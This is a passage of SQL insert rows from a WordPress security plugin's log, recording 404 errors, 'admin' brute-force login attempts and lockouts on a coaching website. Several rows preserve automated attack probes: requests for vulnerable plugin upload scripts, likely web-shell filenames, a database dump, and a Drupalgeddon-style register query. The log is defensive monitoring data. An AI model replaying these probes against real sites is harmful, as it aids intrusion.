(85136, 'four_oh_four', '404 Error', 3, '2018-04-21 12:21:52', '2018-04-21 17:21:52', '157.55.39.205', '', 0, '/certified-coaches/www.ThrivingBusinessPartners.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85137, 'four_oh_four', '404 Error', 3, '2018-04-21 12:31:12', '2018-04-21 17:31:12', '181.177.118.173', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(85138, 'four_oh_four', '404 Error', 3, '2018-04-21 12:31:14', '2018-04-21 17:31:14', '181.177.118.173', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(85139, 'four_oh_four', '404 Error', 3, '2018-04-21 12:39:45', '2018-04-21 17:39:45', '105.226.249.71', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85140, 'four_oh_four', '404 Error', 3, '2018-04-21 13:02:25', '2018-04-21 18:02:25', '79.183.73.68', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85141, 'four_oh_four', '404 Error', 3, '2018-04-21 13:25:38', '2018-04-21 18:25:38', '185.86.164.108', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85142, 'four_oh_four', '404 Error', 3, '2018-04-21 13:37:33', '2018-04-21 18:37:33', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85143, 'four_oh_four', '404 Error', 3, '2018-04-21 13:37:34', '2018-04-21 18:37:34', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85144, 'four_oh_four', '404 Error', 3, '2018-04-21 13:37:36', '2018-04-21 18:37:36', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85145, 'four_oh_four', '404 Error', 3, '2018-04-21 13:37:37', '2018-04-21 18:37:37', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85146, 'four_oh_four', '404 Error', 3, '2018-04-21 13:44:02', '2018-04-21 18:44:02', '216.244.66.247', '', 0, '/blog/page/72/russiaslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85147, 'four_oh_four', '404 Error', 3, '2018-04-21 13:44:51', '2018-04-21 18:44:51', '103.240.207.216', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85148, 'four_oh_four', '404 Error', 3, '2018-04-21 15:27:34', '2018-04-21 20:27:34', '193.106.30.99', '', 0, '/wp-installation.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85149, 'four_oh_four', '404 Error', 3, '2018-04-21 15:30:36', '2018-04-21 20:30:36', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85150, 'four_oh_four', '404 Error', 3, '2018-04-21 15:32:41', '2018-04-21 20:32:41', '185.86.167.4', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85151, 'four_oh_four', '404 Error', 3, '2018-04-21 16:04:53', '2018-04-21 21:04:53', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85152, 'four_oh_four', '404 Error', 3, '2018-04-21 16:07:07', '2018-04-21 21:07:07', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85153, 'four_oh_four', '404 Error', 3, '2018-04-21 16:10:44', '2018-04-21 21:10:44', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(85154, 'four_oh_four', '404 Error', 3, '2018-04-21 16:17:22', '2018-04-21 21:17:22', '185.85.239.195', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84883, 'lockout', 'Host or User Lockout', 10, '2018-04-19 15:59:29', '2018-04-19 20:59:29', '50.252.39.25', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-19 16:14:29";s:11:"expires_gmt";s:19:"2018-04-19 21:14:29";s:4:"type";s:11:"brute_force";}'),
(84882, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 15:59:29', '2018-04-19 20:59:29', '50.252.39.25', 'admin', 0, '', '', 'a:0:{}'),
(84880, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 15:59:29', '2018-04-19 20:59:29', '50.252.39.25', 'admin', 0, '', '', 'a:0:{}'),
(84881, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 15:59:29', '2018-04-19 20:59:29', '50.252.39.25', 'admin', 0, '', '', 'a:0:{}'),
(84879, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 15:59:29', '2018-04-19 20:59:29', '50.252.39.25', 'admin', 0, '', '', 'a:0:{}'),
(84878, 'four_oh_four', '404 Error', 3, '2018-04-19 15:59:16', '2018-04-19 20:59:16', '50.252.39.25', '', 0, '/', '', 'a:1:{s:12:"query_string";s:8:"author=1";}'),
(84877, 'four_oh_four', '404 Error', 3, '2018-04-19 15:35:24', '2018-04-19 20:35:24', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84876, 'four_oh_four', '404 Error', 3, '2018-04-19 15:35:23', '2018-04-19 20:35:23', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84875, 'four_oh_four', '404 Error', 3, '2018-04-19 15:35:21', '2018-04-19 20:35:21', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84874, 'four_oh_four', '404 Error', 3, '2018-04-19 15:35:20', '2018-04-19 20:35:20', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84873, 'four_oh_four', '404 Error', 3, '2018-04-19 15:33:52', '2018-04-19 20:33:52', '84.201.133.97', '', 0, '/blog/page/72/russiaslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84872, 'four_oh_four', '404 Error', 3, '2018-04-19 15:33:50', '2018-04-19 20:33:50', '100.43.90.108', '', 0, '/blog/page/72/russiaslot.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84870, 'four_oh_four', '404 Error', 3, '2018-04-19 15:23:35', '2018-04-19 20:23:35', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84871, 'four_oh_four', '404 Error', 3, '2018-04-19 15:33:47', '2018-04-19 20:33:47', '5.255.250.80', '', 0, '/blog/page/72/aztek-avtomat.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84869, 'four_oh_four', '404 Error', 3, '2018-04-19 15:17:10', '2018-04-19 20:17:10', '213.74.82.145', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84868, 'four_oh_four', '404 Error', 3, '2018-04-19 14:08:56', '2018-04-19 19:08:56', '198.12.105.72', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84866, 'four_oh_four', '404 Error', 3, '2018-04-19 13:42:40', '2018-04-19 18:42:40', '62.4.15.64', '', 0, '/global-belief-relief/sitemap.xml.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84867, 'four_oh_four', '404 Error', 3, '2018-04-19 14:08:55', '2018-04-19 19:08:55', '198.12.105.72', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84865, 'four_oh_four', '404 Error', 3, '2018-04-19 13:30:08', '2018-04-19 18:30:08', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84864, 'four_oh_four', '404 Error', 3, '2018-04-19 13:30:06', '2018-04-19 18:30:06', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84863, 'four_oh_four', '404 Error', 3, '2018-04-19 12:42:41', '2018-04-19 17:42:41', '193.106.30.99', '', 0, '/global-belief-relief/wp-content/plugins/plugin/info.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84862, 'four_oh_four', '404 Error', 3, '2018-04-19 12:35:54', '2018-04-19 17:35:54', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84861, 'four_oh_four', '404 Error', 3, '2018-04-19 12:35:53', '2018-04-19 17:35:53', '103.99.0.218', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84860, 'four_oh_four', '404 Error', 3, '2018-04-19 12:27:50', '2018-04-19 17:27:50', '193.106.30.99', '', 0, '/wp-content/plugins/plugin/info.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84859, 'four_oh_four', '404 Error', 3, '2018-04-19 11:08:21', '2018-04-19 16:08:21', '113.95.165.4', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84858, 'four_oh_four', '404 Error', 3, '2018-04-19 11:08:19', '2018-04-19 16:08:19', '113.95.165.4', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84857, 'four_oh_four', '404 Error', 3, '2018-04-19 10:23:50', '2018-04-19 15:23:50', '192.42.116.16', '', 0, '/global-belief-relief/QSLWp/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84856, 'four_oh_four', '404 Error', 3, '2018-04-19 10:21:25', '2018-04-19 15:21:25', '91.200.12.193', '', 0, '/plupload/examples/upload.php', 'http://clearyourbeliefs.com/plupload/examples/upload.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84855, 'four_oh_four', '404 Error', 3, '2018-04-19 10:21:25', '2018-04-19 15:21:25', '91.200.12.193', '', 0, '/plupload/examples/upload.php', 'http://clearyourbeliefs.org/plupload/examples/upload.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(84854, 'four_oh_four', '404 Error', 3, '2018-04-19 06:14:07', '2018-04-19 11:14:07', '193.106.30.99', '', 0, '/wp-includse.php', '', 'a:1:{s:12:"query_string";s:8:"script=1";}'),
(84853, 'four_oh_four', '404 Error', 3, '2018-04-19 06:01:41', '2018-04-19 11:01:41', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84852, 'four_oh_four', '404 Error', 3, '2018-04-19 06:01:40', '2018-04-19 11:01:40', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84851, 'four_oh_four', '404 Error', 3, '2018-04-19 06:01:37', '2018-04-19 11:01:37', '104.220.105.69', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84850, 'four_oh_four', '404 Error', 3, '2018-04-19 06:01:36', '2018-04-19 11:01:36', '104.220.105.69', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84849, 'four_oh_four', '404 Error', 3, '2018-04-19 05:09:38', '2018-04-19 10:09:38', '193.106.30.99', '', 0, '/global-belief-relief/wp-includse.php', '', 'a:1:{s:12:"query_string";s:8:"script=1";}'),
(84848, 'four_oh_four', '404 Error', 3, '2018-04-19 04:55:18', '2018-04-19 09:55:18', '207.244.149.106', '', 0, '/wp-content/themes/gallery/style.css', 'http://www.clearyourbeliefs.com/wp-content/themes/gallery/style.css', 'a:1:{s:12:"query_string";s:0:"";}'),
(84847, 'four_oh_four', '404 Error', 3, '2018-04-19 04:55:10', '2018-04-19 09:55:10', '207.244.149.106', '', 0, '/wp-content/themes/gallery/style.css', 'http://www.clearyourbeliefs.org/wp-content/themes/gallery/style.css', 'a:1:{s:12:"query_string";s:0:"";}'),
(84846, 'four_oh_four', '404 Error', 3, '2018-04-19 03:53:30', '2018-04-19 08:53:30', '180.190.175.246', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84845, 'four_oh_four', '404 Error', 3, '2018-04-19 03:27:34', '2018-04-19 08:27:34', '193.106.30.99', '', 0, '/wp-includes/css/hi.php', '', 'a:1:{s:12:"query_string";s:3:"0=1";}'),
(84844, 'four_oh_four', '404 Error', 3, '2018-04-19 03:19:28', '2018-04-19 08:19:28', '91.200.12.193', '', 0, '/wp-content/themes/Clockstone/style.css', 'http://clearyourbeliefs.com/wp-content/themes/Clockstone/style.css', 'a:1:{s:12:"query_string";s:0:"";}'),
(84843, 'four_oh_four', '404 Error', 3, '2018-04-19 03:19:28', '2018-04-19 08:19:28', '91.200.12.193', '', 0, '/wp-content/themes/Clockstone/style.css', 'http://clearyourbeliefs.org/wp-content/themes/Clockstone/style.css', 'a:1:{s:12:"query_string";s:0:"";}'),
(84842, 'four_oh_four', '404 Error', 3, '2018-04-19 03:17:44', '2018-04-19 08:17:44', '107.152.198.93', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(84841, 'four_oh_four', '404 Error', 3, '2018-04-19 02:58:41', '2018-04-19 07:58:41', '139.5.242.153', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84840, 'four_oh_four', '404 Error', 3, '2018-04-19 02:44:10', '2018-04-19 07:44:10', '182.65.25.94', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84839, 'four_oh_four', '404 Error', 3, '2018-04-19 02:39:43', '2018-04-19 07:39:43', '207.46.13.199', '', 0, '/global-belief-relief/robots.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84838, 'four_oh_four', '404 Error', 3, '2018-04-19 02:38:05', '2018-04-19 07:38:05', '157.55.39.52', '', 0, '/global-belief-relief/robots.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84837, 'four_oh_four', '404 Error', 3, '2018-04-19 02:32:38', '2018-04-19 07:32:38', '104.168.47.155', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84836, 'four_oh_four', '404 Error', 3, '2018-04-19 02:32:37', '2018-04-19 07:32:37', '104.168.47.155', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84835, 'four_oh_four', '404 Error', 3, '2018-04-19 02:21:38', '2018-04-19 07:21:38', '66.249.69.102', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84834, 'four_oh_four', '404 Error', 3, '2018-04-19 01:34:49', '2018-04-19 06:34:49', '207.46.13.144', '', 0, '/wp-content/uploads/2014/03/the-clear-your-beliefs-guidebook.pdf', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84832, 'four_oh_four', '404 Error', 3, '2018-04-19 01:13:38', '2018-04-19 06:13:38', '77.238.139.72', '', 0, '/database.sql', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84833, 'four_oh_four', '404 Error', 3, '2018-04-19 01:13:38', '2018-04-19 06:13:38', '77.238.139.72', '', 0, '/database.sql', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84831, 'four_oh_four', '404 Error', 3, '2018-04-19 00:43:24', '2018-04-19 05:43:24', '47.254.18.26', '', 0, '/wp-content/plugins/wp-symposium/server/php/gfLpJHRkDVSBCV.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84830, 'four_oh_four', '404 Error', 3, '2018-04-19 00:42:37', '2018-04-19 05:42:37', '47.254.18.26', '', 0, '/wp-content/plugins/formcraft/file-upload/server/php/upload.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84829, 'four_oh_four', '404 Error', 3, '2018-04-19 00:42:28', '2018-04-19 05:42:28', '47.254.18.26', '', 0, '/wp-content/plugins/wp-mobile-detector/cache/db.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84828, 'four_oh_four', '404 Error', 3, '2018-04-19 00:42:16', '2018-04-19 05:42:16', '47.254.18.26', '', 0, '/wp-content/plugins/simple-ads-manager/js/slider/tmpl.js', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84827, 'four_oh_four', '404 Error', 3, '2018-04-19 00:38:30', '2018-04-19 05:38:30', '70.31.219.28', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84826, 'four_oh_four', '404 Error', 3, '2018-04-19 00:16:56', '2018-04-19 05:16:56', '62.4.15.41', '', 0, '/global-belief-relief/user/register', '', 'a:1:{s:12:"query_string";s:142:"element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax";}'),
(84825, 'four_oh_four', '404 Error', 3, '2018-04-19 00:02:03', '2018-04-19 05:02:03', '216.244.66.234', '', 0, '/blog/page/72/slotyru.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84823, 'four_oh_four', '404 Error', 3, '2018-04-18 23:40:10', '2018-04-19 04:40:10', '100.43.85.173', '', 0, '/blog/page/73/zoloto-avtomat.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84824, 'four_oh_four', '404 Error', 3, '2018-04-19 00:01:59', '2018-04-19 05:01:59', '216.244.66.234', '', 0, '/blog/page/72/gmblslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84822, 'four_oh_four', '404 Error', 3, '2018-04-18 23:19:20', '2018-04-19 04:19:20', '193.106.30.99', '', 0, '/wp-content/themes/twentyfifteen/404.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84821, 'four_oh_four', '404 Error', 3, '2018-04-18 22:21:56', '2018-04-19 03:21:56', '216.244.66.234', '', 0, '/author/maria/page/42/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84820, 'four_oh_four', '404 Error', 3, '2018-04-18 22:14:05', '2018-04-19 03:14:05', '125.188.56.184', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84819, 'four_oh_four', '404 Error', 3, '2018-04-18 21:34:47', '2018-04-19 02:34:47', '142.252.250.111', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84818, 'four_oh_four', '404 Error', 3, '2018-04-18 21:34:45', '2018-04-19 02:34:45', '142.252.250.111', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84817, 'four_oh_four', '404 Error', 3, '2018-04-18 20:44:55', '2018-04-19 01:44:55', '41.182.74.167', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84816, 'four_oh_four', '404 Error', 3, '2018-04-18 20:08:45', '2018-04-19 01:08:45', '167.99.64.242', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84815, 'four_oh_four', '404 Error', 3, '2018-04-18 20:08:44', '2018-04-19 01:08:44', '167.99.64.242', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84814, 'four_oh_four', '404 Error', 3, '2018-04-18 19:37:09', '2018-04-19 00:37:09', '50.117.38.4', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84813, 'four_oh_four', '404 Error', 3, '2018-04-18 19:37:09', '2018-04-19 00:37:09', '50.117.38.4', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84812, 'four_oh_four', '404 Error', 3, '2018-04-18 18:03:31', '2018-04-18 23:03:31', '181.129.165.66', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84811, 'four_oh_four', '404 Error', 3, '2018-04-18 18:00:23', '2018-04-18 23:00:23', '95.70.134.149', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84810, 'four_oh_four', '404 Error', 3, '2018-04-18 18:00:20', '2018-04-18 23:00:20', '95.70.134.149', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84809, 'four_oh_four', '404 Error', 3, '2018-04-18 17:09:58', '2018-04-18 22:09:58', '216.244.66.234', '', 0, '/author/maria/page/45/supergoldslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84808, 'four_oh_four', '404 Error', 3, '2018-04-18 17:09:56', '2018-04-18 22:09:56', '216.244.66.247', '', 0, '/author/maria/page/45/gmblslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84807, 'four_oh_four', '404 Error', 3, '2018-04-18 17:00:33', '2018-04-18 22:00:33', '216.244.66.234', '', 0, '/category/clear-your-beliefs/page/71/aztek-avtomat.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84889, 'four_oh_four', '404 Error', 3, '2018-04-19 17:15:49', '2018-04-19 22:15:49', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84890, 'four_oh_four', '404 Error', 3, '2018-04-19 17:15:50', '2018-04-19 22:15:50', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84891, 'four_oh_four', '404 Error', 3, '2018-04-19 17:29:07', '2018-04-19 22:29:07', '207.46.13.115', '', 0, '/certified-coaches/www.RadiantClarity.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84892, 'four_oh_four', '404 Error', 3, '2018-04-19 17:30:54', '2018-04-19 22:30:54', '40.77.167.212', '', 0, '/liongoodman-com/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84893, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 17:37:52', '2018-04-19 22:37:52', '51.15.82.2', 'admin', 0, '', '', 'a:0:{}'),
(84894, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 17:37:52', '2018-04-19 22:37:52', '51.15.82.2', 'admin', 0, '', '', 'a:0:{}'),
(84895, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 17:37:52', '2018-04-19 22:37:52', '51.15.82.2', 'admin', 0, '', '', 'a:0:{}'),
(84896, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 17:37:52', '2018-04-19 22:37:52', '51.15.82.2', 'admin', 0, '', '', 'a:0:{}'),
(84897, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 17:37:52', '2018-04-19 22:37:52', '51.15.82.2', 'admin', 0, '', '', 'a:0:{}'),
(84898, 'lockout', 'Host or User Lockout', 10, '2018-04-19 17:37:52', '2018-04-19 22:37:52', '51.15.82.2', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-19 17:52:52";s:11:"expires_gmt";s:19:"2018-04-19 22:52:52";s:4:"type";s:11:"brute_force";}'),
(84899, 'four_oh_four', '404 Error', 3, '2018-04-19 17:54:53', '2018-04-19 22:54:53', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84900, 'four_oh_four', '404 Error', 3, '2018-04-19 17:54:54', '2018-04-19 22:54:54', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84901, 'four_oh_four', '404 Error', 3, '2018-04-19 19:20:33', '2018-04-20 00:20:33', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84902, 'four_oh_four', '404 Error', 3, '2018-04-19 19:20:34', '2018-04-20 00:20:34', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84903, 'four_oh_four', '404 Error', 3, '2018-04-19 19:20:36', '2018-04-20 00:20:36', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84904, 'four_oh_four', '404 Error', 3, '2018-04-19 19:20:37', '2018-04-20 00:20:37', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84905, 'four_oh_four', '404 Error', 3, '2018-04-19 19:25:02', '2018-04-20 00:25:02', '144.121.196.10', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84906, 'four_oh_four', '404 Error', 3, '2018-04-19 19:36:39', '2018-04-20 00:36:39', '100.43.85.173', '', 0, '/blog/page/70/supergoldslots.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84907, 'four_oh_four', '404 Error', 3, '2018-04-19 19:39:33', '2018-04-20 00:39:33', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84908, 'four_oh_four', '404 Error', 3, '2018-04-19 19:39:34', '2018-04-20 00:39:34', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84909, 'four_oh_four', '404 Error', 3, '2018-04-19 19:46:48', '2018-04-20 00:46:48', '193.106.30.99', '', 0, '/wp-content/plugins/easyrotator-for-wordpress/cache.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84910, 'four_oh_four', '404 Error', 3, '2018-04-19 20:03:44', '2018-04-20 01:03:44', '193.106.30.99', '', 0, '/global-belief-relief/wp-content/plugins/easyrotator-for-wordpress/cache.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84911, 'four_oh_four', '404 Error', 3, '2018-04-19 20:51:30', '2018-04-20 01:51:30', '173.44.165.6', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2474";}'),
(84912, 'four_oh_four', '404 Error', 3, '2018-04-19 21:29:50', '2018-04-20 02:29:50', '113.95.165.4', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(84913, 'four_oh_four', '404 Error', 3, '2018-04-19 21:29:51', '2018-04-20 02:29:51', '113.95.165.4', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(84914, 'four_oh_four', '404 Error', 3, '2018-04-19 21:49:23', '2018-04-20 02:49:23', '216.244.66.247', '', 0, '/category/clear-your-beliefs/page/72/slotyru.com', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84915, 'four_oh_four', '404 Error', 3, '2018-04-19 21:55:18', '2018-04-20 02:55:18', '49.145.136.198', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84916, 'four_oh_four', '404 Error', 3, '2018-04-19 22:03:10', '2018-04-20 03:03:10', '58.65.197.34', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84917, 'four_oh_four', '404 Error', 3, '2018-04-19 23:16:58', '2018-04-20 04:16:58', '66.249.69.96', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84918, 'four_oh_four', '404 Error', 3, '2018-04-19 23:34:30', '2018-04-20 04:34:30', '216.244.66.234', '', 0, '/author/maria/page/7/mariajgarcia@verizon.net', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(84919, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 23:52:01', '2018-04-20 04:52:01', '79.124.59.194', 'admin', 0, '', '', 'a:0:{}'),
(84920, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 23:52:01', '2018-04-20 04:52:01', '79.124.59.194', 'admin', 0, '', '', 'a:0:{}'),
(84921, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 23:52:01', '2018-04-20 04:52:01', '79.124.59.194', 'admin', 0, '', '', 'a:0:{}'),
(84922, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 23:52:01', '2018-04-20 04:52:01', '79.124.59.194', 'admin', 0, '', '', 'a:0:{}'),
(84923, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-19 23:52:01', '2018-04-20 04:52:01', '79.124.59.194', 'admin', 0, '', '', 'a:0:{}'),
(84924, 'lockout', 'Host or User Lockout', 10, '2018-04-19 23:52:01', '2018-04-20 04:52:01', '79.124.59.194', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-04-20 00:07:01";s:11:"expires_gmt";s:19:"2018-04-20 05:07:01";s:4:"type";s:11:"brute_force";}'),
(84925, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-20 00:38:36', '2018-04-20 05:38:36', '93.115.95.204', 'admin', 0, '', '', 'a:0:{}'),
(84926, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-20 00:38:36', '2018-04-20 05:38:36', '93.115.95.204', 'admin', 0, '', '', 'a:0:{}'),
(84927, 'brute_force', 'Invalid Login Attempt', 5, '2018-04-20 00:38:36', '2018-04-20 05:38:36', '93.115.95.204', 'admin', 0, '', '', 'a:0:{}'),
